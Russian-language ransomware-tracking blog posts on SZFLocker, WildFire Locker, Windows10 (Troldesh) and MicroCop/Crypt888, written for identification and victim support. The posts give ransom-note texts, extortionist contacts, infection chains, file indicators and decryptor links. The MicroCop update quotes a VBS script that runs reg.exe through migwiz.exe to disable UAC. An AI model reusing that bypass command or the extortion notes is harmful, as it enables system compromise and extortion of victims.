Если вы не видите здесь изображений, то используйте VPN.

четверг, 30 июня 2016 г.

SZFLocker

SZFLocker (Polish) Ransomware

(шифровальщик-вымогатель)


   Этот криптовымогатель шифрует файлы пользователя, а затем вписывает во все текстовые файлы текст на польском языке, предписывающий обратиться на email вымогателя. 

  К зашифрованным файлам добавляется расширение .szf. Название вымогатель получил от этого расширения. 



Перевод записки на русский язык:
Файл зашифрован. Услуга дешифровки доступна по адресу deszyfrator.deszyfr@yandex.ru

Степень распространенности: низкая.
Подробные сведения собираются. 

Внимание!
Для зашифрованных файлов есть декриптер

WildFire Locker

WildFire Locker Ransomware

(шифровальщик-вымогатель)


   Этот крипто-вымогатель шифрует файлы с помощью AES-256 (CBC режим), а затем требует выкуп в $/€ 299. На уплату выкупа даётся неделя, а потом цена увеличится в 3 раза. 

К зашифрованным файлам добавляется расширение .wflx

© Генеалогия:  GNL Locker > Zyklon Locker > WildFire Locker

Записки о выкупе называются: 
HOW_TO_UNLOCK_FILES_README_(<ID>).html (перевод "Как разблокировать файлы. Прочтите")
HOW_TO_UNLOCK_FILES_README_(<ID>).txt
HOW_TO_UNLOCK_FILES_README_(<ID>).bmp



Содержание записки о выкупе:
All your files have been encrypted by WildFire Locker
All your files have been encrypted with an unique 32 characters long password using AES-256 CBC encryption.

The only way to get your files back is by purchasing the decryption password!
The decryption password will cost $/€299.
You have untill woensdag 6 juli 2016 UTC before the price increases to $/€999!

Antivirus software will NOT be able to recover your files! The only way to recover your files is by purchasing the decryption password.
Personal ID: [redacted]

Visit one of the websites below to purchase your decryption password!
http://exithub1.su/[***]
http://exithub2.su/[***]

If these websites don't work follow the steps below
1. Download the TOR Browser Bundle https://www.torproject.org/projects/torbrowser.html.en#downloads
2. Install and then open the Tor Browser Bundle.
3. Inside the Tor Browser Bundle navigate to gsxrmcgsygcxfkbb.onion/[***]

Перевод на русский язык: 
Все ваши файлы зашифрованы WildFire Locker
Все ваши файлы зашифрованы с уникальными 32 символьным паролем с помощью AES-256 CBC шифрование.

Единственный способ получить файлы обратно — это купить пароль дешифровки!
Пароль дешифровки стоит $/€ 299.
У вас есть время до 6 июля 2016 по ВКВ, когда цена возрастет до $/€ 999!

Антивирусное ПО не восстановит ваши файлы! Можно восстановить файлы, только купив пароль дешифровки.
Ваш ID: [***]

Посети один из сайтов, чтобы купить ваш пароль дешифровки!
http://exithub1.su/[***]
http://exithub2.su/[***]

Если эти сайты не работают, следуй пунктам ниже
1. Загрузи браузер Tor https://www.torproject.org/projects/torbrowser.html.en#downloads
2. Установи, а затем открой браузер Tor.
3. Из браузера Tor открой gsxrmcgsygcxfkbb.onion / [***]


Сайт уплаты выкупа с платежной информацией

Форма отправки запроса на помощь

На странице уплаты выкупа имеется ссылка на форму обратной связи с вымогателями. 

Текст на экране:
On this page you can ask questions if you want to know something or need help.
We will get back to you within 24 hours (our answers will be shown on this page)

Перевод текста:
Здесь можете задать вопросы, если хотите что-то узнать или нужна помощь.
Мы ответим вам за 24 часа (ваши ответы будут отображены на этой странице)


По данным специалистов у WildFire Locker тот же код, те же слои запутывания, те же C&C-серверы, только другие расширения и записка о выкупе. 

От атаки WildFire освобождены только ряд стран Восточной Европы: Россия, Беларусь, Украина, Латвия, Эстония и Молдова. См. отчет в блоге McAffee

Распространяется с помощью ботнета Kelihos и email-спама с вредоносным вложением. Письма оформлены на голландском языке и имитируют уведомление о недоставке груза. Получателю советуют оформить новую заявку в транспортный отдел, форму которой якобы можно скачать по указанной ссылке вместе с базовой информацией о порядке доставки.

По ссылке находится doc-файл с вредоносный макросом, для активации которого пользователю предлагается (на английском и голландском языках) включить режим редактирования, а затем активировать макросы в документе. Как показал анализ VBA-зловреда, в его исходный код включен ряд произвольных имен (TonyMontanaZRanaJakmietana, KerryMcNot, LouiseBackdone), в том числе несколько знакомых для поклонников творчества Толкина: Nazgul, MinasTirit, Gondor.

Этот загрузчик и доставляет жертве WildFire Locker. Сайт, созданный злоумышленниками для приема платежей, размещен в анонимной сети Tor. Для определения местоположения жертвы он использует специальный плагин.

Степень распространенности: низкая.
Подробные сведения собираются. 



Внимание! 
Для зашифрованных файлов есть 2 дешифровщика:
Скачать WildFire Decryptor от Kaspersky >>
Скачать McAfee Ransomware Recover (Decryption Tool) >>

© Amigo-A (Andrew Ivanov): All blog articles. 


Remove WildFire Locker Decrypt Decode Restore files Recovery data Удалить WildFire Дешифровать Расшифровать Восстановить файлы

среда, 29 июня 2016 г.

Windows10

Windows10 Ransomware


   Это крипто-вымогатель шифрует файлы, а затем требует выкуп 0,5 биткоинов или больше за дешифровку. 

К зашифрованным файлам добавляется расширение .windows10

 © Генеалогия: Troldesh (Shade) > Windows10 Ransomware

 Ориентирован, главным образом, на русскоязычных пользователей. Англоязычный текст в первой фразе короче на три слова и добавлен вторым на тот случай, если среди пострадавших будут иноязычные пользователи. 

Записки о выкупе README.txt создаются в каждой папке, где есть зашифрованные файлы, на Рабочем столе, в корневых директориях всех дисков, в том числе и подключенных к компьютеру внешних дисках. 

Текст на изображении, встающим обоями рабочего стола, аналогичен тому, что был у Troldesh (Shade).

Содержание записки о выкупе на скриншоте написано на двух языках:
ВНИМАНИЕ!
Все важные файлы на всех дисках вашего компьютера были зашифрованы.
Подробности вы можете прочитать в файлах README.txt, которые можно найти на любом из дисков.

ATTENTION!
All the important files on your disks were encrypted.
The details can be found in the README.txt files which you can find on any of your drives.


Содержание тестовых записок с именами README1.txt, README2.txt — README10.txt и пр. 
Ваши файлы были зашифрованы.
Чтобы расшифровать их, Вам необходимо отправить код:
095AAECA1E4B0BCD71DE|677|3|2
на электронный адрес Ryabinina.Lina@gmail.com .
Далее вы получите все необходимые инструкции.
Попытки расшифровать самостоятельно не приведут ни к чему, кроме безвозвратной потери информации.
Если вы всё же хотите попытаться, то предварительно сделайте резервные копии файлов, иначе в случае
их изменения расшифровка станет невозможной ни при каких условиях.
Если вы не получили ответа по вышеуказанному адресу в течение 48 часов (и только в этом случае!),
воспользуйтесь формой обратной связи. Это можно сделать двумя способами:
1) Скачайте и установите Tor Browser по ссылке: https://www.torproject.org/download/download-easy.html.en
В адресной строке Tor Browser-а введите адрес:
http://cryptorz76e7vuik.onion/
и нажмите Enter. Загрузится страница с формой обратной связи.
2) В любом браузере перейдите по одному из адресов:
http://cryptorz76e7vuik.onion.to/
http://cryptorz76e7vuik.onion.cab/

All the important files on your computer were encrypted.
To decrypt the files you should send the following code:
095AAECA1E4B0BCD71DE|677|3|2
to e-mail address Ryabinina.Lina@gmail.com .
Then you will receive all necessary instructions.
All the attempts of decryption by yourself will result only in irrevocable loss of your data.
If you still want to try to decrypt them by yourself please make a backup at first because
the decryption will become impossible in case of any changes inside the files.
If you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),
use the feedback form. You can do it by two ways:
1) Download Tor Browser from here:
https://www.torproject.org/download/download-easy.html.en
Install it and type the following address into the address bar:
http://cryptorz76e7vuik.onion/
Press Enter and then the page with feedback form will be loaded.
2) Go to the one of the following addresses in any browser:
http://cryptorz76e7vuik.onion.to/
http://cryptorz76e7vuik.onion.cab/

Судя по зашифрованным файлам, вредонос самым изуверским образом портит имя файла, как это делали раньше предыдущие криптовымогатели, например, Troldesh/Shade. 

Зашифрованные файлы будут выглядеть примерно так: 
w4f-SSkK3HC6ncNeAjfrRalI+OOwFyNPOEUDel1nktH+Ddg4-dZJfEpr8rh+nfXn[.ID_жертвы].windows10 
Перед добавляемым расширением .windows10 легко угадывается ID жертвы. На скриншоте это недорасширение .095AAECA1E4BOBCD71DE

Предположительно этот криптовымогатель является разновидностью или дальнейшим развитием Shade, потому, как и прародитель, может представлять серьёзную опасность для пользователей, если получит широкое распространение. 

Степень распространенности: средняя.
Подробные сведения собираются. 



=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

Troldesh-1 Ransomware 
Расширения: .xbtl и .cbtl
decode00001@gmail.com
decode00002@gmail.com ...
decode77777@gmail.com ...
decode99999@gmail.com
files000001@gmail.com ...
files640@gmail.com ...
files08880@gmailcom

files08881@gmailcom ...

Troldesh-2 Ransomware 
Расширения: .breaking_bad и .heisenberg
Email: files000001@gmail.com
Время распространения:  сентябрь - декабрь 2015, январь 2016 - далее

Troldesh-Ransomware
Расширение: .better_call_saul
Email: decode99999@gmail.com, decode77777@gmail.com, files640@gmail.com
Время распространения: январь - март 2016 - далее

Troldesh-4 Ransomware 
Расширение: .windows10
Email: Ryabinina.Lina@gmail.com
Время распространения: июнь 2016 - далее

Troldesh-Next Ransomware
Расширение: .no_more_ransom
Email: VladimirScherbinin1991@gmail.com
-
Расширения: .da_vinci_code и .magic_software_syndicate
Email: Lukyan.Sazonov26@gmail.com
-
Расширение: .dexter
Email: Ryabinina.Lina@gmail.com
-
Расширение: .crypted000007
Novikov.Vavila@gmail.com
-
Расширения: .crypted000007 и .crypted000078
selenadymond@gmail.com
-

Расширение .crypted000007
gervasiy.menyaev@gmail.com



=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

См. выше историю семейства


=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===
 Read to links: 
 Tweet on Twitter + Tweet 
 ID Ransomware (ID as )
 Write-up, Topic of Support
 * 
 Thanks: 
 Michael Gillespie, MalwareHunterTeam
 Andrew Ivanov
 Alex Svirid
 *
 

© Amigo-A (Andrew Ivanov): All blog articles.

Remove Windows10 Shade Decrypt Windows 10 Decode Restore files Recovery data Troldesh Удалить Дешифровать Расшифровать Восстановить файлы

MicroCop

MicroCop Ransomware

Aliases: MirCop, Crypt888

MicroCop NextGen Ransomware

(шифровальщик-вымогатель)

Translation into English


   Этот крипто-вымогатель шифрует файлы с помощью DES-шифрования, а затем требует вернуть якобы украденные 48,48 биткоинов. На самом деле банально вымогает выкуп. По сути это один из самых крупных выкупов в истории крипто-вымогательства последних лет. Имеет другое название: Crypt888. Написан на AutoIt. 

Обнаружения: 
DrWeb -> W97M.DownLoader.1560, Trojan.PWS.Siggen1.54140, Trojan.MulDrop5.13451, Trojan.Encoder.24597, Trojan.Bankfraud.3628
ALYac -> Dropped:Trojan.Generic.17350659, Trojan.Ransom.Crypt888
Avira (no cloud) -> HEUR/Macro.Agent, DR/AutoIt.Gen
BitDefender -> Generic.Ransom.Locked.3D08AF5C, AIT:Trojan.Nymeria.2448
ESET-NOD32 -> Win32/Spy.Banker.ADES, Multiple Detections, A Variant Of Win32/Filecoder.Crypt888.B
Malwarebytes -> Ransom.Microcop
Microsoft -> Ransom:Win32/Pocrimcrypt.A, Ransom:AutoIt/Lokmwiz.A
Rising -> Spyware.Banker!8.8D (CLOUD), Ransom.Lokmwiz!8.E16C*
Symantec -> Ransom.Cryptolocker, Ransom.CryptXXX
Tencent -> Win32.Trojan-banker.Agent.Wsan, Win32.Trojan-banker.Agent.Hrzc
TrendMicro -> Ransom_MIRCOP.G, Ransom_MIRCOP.H

К зашифрованным файлам добавляется не расширение, а приставка Lock. Таким образом зашифрованный файл выглядит так: Lock.original_name.png

Также приставка Lock. добавляется к папкам с файлами и к ярлыкам на Рабочем столе. 

  На скринлоке (графическом варианте записки о выкупе, который ставит обоями на рабочем столе файл wl.jpg), можно видеть фигуру в капюшоне и в маске Гая Фокса. Изображение позаимствовано у известной музыкальной группы Hacktivist, а текст просто заменен другим.  Эту маску также использует хакерская группа Anonymous. 

  В конце записки приводится Bitcoin-адрес, на который нужно перевести сумму выкупа. Никаких инструкций для жертвы вымогательства не предоставляется. Видимо, предполагается, что в "век развитого компьютерного вымогательства" все уже должны знать, что такое биткоины, как их получать и переводить другим. 


Текст со скринлока:
Hello.
You've stolen 48.48 BTC from the wrong people, please be so kind to return them and we will return your files.
Don't take us for fools, we know more about you than you know about yourself.
Pay us back and we won't take further action, don't pay and be prepared.
Bitcoin address...

Перевод на русский:
Привет.
Вы украли 48.48 BTC не у тех людей, потому будьте любезны вернуть их, и мы вернем ваши файлы.
Не считайте нас дураками, мы знаем о вас больше, чем вы знаете о себе.
Верните и мы тогда не зайдём дальше, не заплатите, будьте готовы.
Bitcoin-адрес...

Примечательно, что кроме биткоин-адреса для оплаты, вымогатели не дают пострадавшей стороне никаких контактов для связи. 

  Распространяется MirCop через email-спам с вложенным документом. Документ якобы от таможни Таиланда, который используется при импорте или экспорте товаров. В нем скрыт вредоносный макрос, который использует Windows PowerShell, чтобы выполнить загрузку собственно криптовымогателя. Злоумышленники используют специальный текст, запрашивающий разрешение на включение макросов для правильного отображения содержимого документа. Расcчитан на неопытных и излишне любопытных. 


  После полученного разрешения браузер пользователя перенаправляется на некий сайт магазина для взрослых на голландском языке, возможно давно взломанный, где размещены вредоносные файлы. Пока жертва его смотрит, на ПК начинается вредоносная деятельность: три файла загружаются в папку %TEMP%. Один из них, с именем c.exe, запускает процедуру, которая ворует пользовательскую информацию (логин-пароли из всех популярных браузеров, из FileZilla, Skype и другие данные). Два других, x.exe и y.exe, начинают шифрование файлов. В автозагрузку добавляется ярлык MicroCop.lnk, запускающий файл x.exe из директории Temp, выполняющий шифрование. 


Как видно из скриншота выше, шифрованию подвержены файлы в пользовательских директориях: Рабочий стол, Музыка, Изображения, Видео, Документы, в том числе и в общих папках. 

Файлы, связанные с MirCop Ransomware:
C:\Users\User-Name\AppData\Local\Temp\8x8x8
C:\Users\User-Name\AppData\Local\Temp\x.exe
C:\Users\User-Name\AppData\Local\Temp\y.exe
C:\Users\User-Name\AppData\Local\Temp\wl.jpg 
C:\Users\User-Name\AppData\Local\VCGTUY.vBS
C:\Users\User-Name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicroCop.lnk

Файлы, связанные с хищением паролей:
C:\Users\User-Name\AppData\Local\Temp\c.exe
C:\Users\User-Name\AppData\Local\Temp\putty.exe
C:\Users\User-Name\AppData\Local\PassW8.txt
C:\Users\User-Name\AppData\Local\Sqlite.dll
C:\Users\User-Name\AppData\Local\aut1.tmp

Записи реестра, связанные с MirCop Ransomware:
HKCU\Control Panel\Desktop\Wallpaper "%UserProfile%\AppData\Local\Temp\wl.jpg"

Вредонос определяется TrendMicro как RANSOM_MIRCOP.A
TrendMicro сокращает названия вредоносов до 6 букв. Так название ярлыка в автозагрузке MicroCop стало MIRCOP. 


Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
См. ниже результаты анализов.

Результаты анализов:
---

Степень распространённости: средняя
Подробные сведения собираются. 


=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Обновление от 14 ноября 2017:

Результаты анализов: VT
<< Скриншот записки 





Обновление от 29 ноября 2017:

Пост в Твиттере >> 
🎥 Видеообзор >>  Спасибо GrujaRS! 
Email: maya_157_ransom@hotmail.com
Использован: Private Builder Ransomware V2.01.exe
Результаты анализов: VT + HA
<< Комбо-скриншот с текстом о выкупе и файлами


Файлы: %TEMP%\888.vbs
%TEMP%\aut4724.tmp
%TEMP%\aut48A2.tmp
%TEMP%\aut48AD.tmp
%TEMP%\fuoodkv



=== 2020 ===

Обновление от 10 февраля 2020: 
Пост в Твиттере >>
Расширение к файлам: .bhacks
Приставка к папкам: Lock.
Записка: 200 dollars.txt
Также используется изображение, заменяющее обои Рабочего стола. 


 

Email: bhacks740@gmail.com

Файл EXE: kkk ransomware.exe
Результаты анализов: VTVMR 


Обновление от 29 июня 2020:
Приставка к файлам: Lock.
Email: j0ra@protonmail.com
Результаты анализов: VT + AR
Файл скрипта: 888.vbs
Файл изображения: wl.jpg




Обновление от 20 августа 2020:
Написан на AutoIt v3. 
Пост в Твиттере >>
Мой пост в Твиттере >>
Приставка к файлам: Lock.
Записка: README.txt
Email: sp00f3rsupp0rt@protonmail.com
Файл скрипта: 888.vbs
Файл изображения: wl.jpg
Специальный файл: 8x8x8
Исполняемые файлы: kekw.exe, x.exe, migwiz.exe, reg.exe
Результаты анализов: VT + AR + IA
---

➤ Содержание файла  README.txt:
Looks like your files have been encrypted.
Contact us: sp00f3rsupp0rt@protonmail.com
to decrypt your files have a nice day
---
Текст записки дублируется в экране блокировки, который появляется первым. Затем вместо обоев встает изображение с красными буквами на чёрном фоне.
 



---
➤ Содержание файла: 888.vbs
File = "C:\Windows\System32\cmd.exe"
Set shll = CreateObject("Wscript.Shell")
shll.run("C:\Windows\System32\migwiz\migwiz.exe " & File & " /c %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"),0,falseFile = "C:\Windows\System32\cmd.exe"
Set shll = CreateObject("Wscript.Shell")
shll.run("C:\Windows\System32\migwiz\migwiz.exe " & File & " /c %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"),0,false
---

Обновление от 28 ноября 2020: 
По факту: Korean Crypt888
Самоназвания: HexadecimalDecryptor 1.0
Hexadecimal Ransomware Decryptor
Приставка к файлам: Lock.
Файлы изображений: wl.jpg, img0.jpg
Файлы: HexInformation.exe, HexDecryptor.exe, HexLocker.exe, WindowsSystemTools.exe
Результаты анализов: VT + TG + VMR

 




Вариант от 18 декабря 2020:
Самоназвание: Angry Lola Loud Ran$omware
Файлы: 888.vbs, wl.jpg
Файл: Angry Lola Loud Ran$omware.exe
Результаты анализов: VT + VMR
➤ Обнаружения: 
DrWeb -> Trojan.Encoder.24597
ALYac -> Generic.Ransom.Locked.3D08AF5C
Avira (no cloud) -> TR/Bancker.8888
BitDefender -> Generic.Ransom.Locked.3D08AF5C
ESET-NOD32 -> Multiple Detections
Kaspersky -> HEUR:Exploit.Script.BypassUAC.gen
Kingsoft -> Win32.Troj.Banker.(kcloud)
Symantec -> Ransom.Cryptolocker
TrendMicro -> Ransom.AutoIt.CRYPTEIGHT.SMTH


=== 2021 ===

Варианты от 23-24 мая 2021: 
Самоназвание: Project_Robux
Расширение: Lock.


---
Расширение: Lock.


---
Самоназвание: KarLocker
Расширение: Lock.




=== 2022 ===

Вариант от 22 мая 2022:
Расширение: Lock.
Результаты анализов: VT + AR




=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===
Внимание!
Для зашифрованных файлов есть дешифровщик (дешифратор).
Скачать дешифровщик для Crypt888 >>
*
*
*
 Read to links: 
 Tweet on Twitter
 ID Ransomware (ID as MirCop)
 Write-up, Topic of Support

 Thanks: 
 BleepingComputer, Michael Gillespie, Jakub Kroustek
 Andrew Ivanov (article author)
 и тем, кто присылает обновления

© Amigo-A (Andrew Ivanov): All blog articles.

Постоянные читатели

My tweet feed

My tweet feed
Follow me!

My profile on BC

My profile on BC
Follow me!

Форма для связи / Contact

Имя

Электронная почта *

Сообщение *